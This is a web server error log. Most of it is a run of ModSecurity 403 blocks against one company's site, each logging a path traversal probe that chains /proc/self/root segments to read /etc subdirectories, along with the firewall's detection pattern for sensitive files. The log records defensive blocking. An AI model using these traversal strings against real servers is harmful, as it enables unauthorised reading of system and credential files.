[Wed Mar 18 10:43:41.074192 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:44844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsDda6ubjKNq_cu4aZagAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:43.459037 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.243.128:44850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsD0zinOy1jxa1j4cU1gAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:44.766218 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:44856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsEOw_le52K8_3pV3fMQAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:46.087632 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:44872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsEgkwaGbbGflqUZAQKQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:47.463908 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:44876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsE9Y0UrI5A3LftIynoQAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:48.771662 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:44880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsFMdf6f5d65gmYZTVCAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:51.989765 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:33678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsF9a6ubjKNq_cu4aZegAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:55.938835 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:33692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsG-w_le52K8_3pV3fNAAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:57.286310 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:33700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsHcdf6f5d65gmYZTVEAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:59.675139 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:33710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsH-oXxyEfFpUF8f9tIQAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:02.036006 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:51922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsIAkwaGbbGflqUZAQRQAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:03.667410 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:51934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsI_u8EFLIOrSqIpsDigAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:04.632925 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:47312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsJAkwaGbbGflqUZAQTQAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:44:05.334664 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:51950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsJfu8EFLIOrSqIpsDjQAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:07.048472 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:51952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsJtY0UrI5A3LftIynpwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:08.581813 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:51964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsKNa6ubjKNq_cu4aZhQAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:09.868698 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:44348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsKSmAPhZkrhU8w4lsPQAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:12.333459 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:44354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsLOw_le52K8_3pV3fPgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:16.411073 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:44364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsMAkwaGbbGflqUZAQXQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:18.039833 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:44376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsMuoXxyEfFpUF8f9tLwAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:19.347350 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:44388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsM-yqAr6etmhZHNq_qQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:44:28.550000 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:38788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsO8df6f5d65gmYZTVJwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
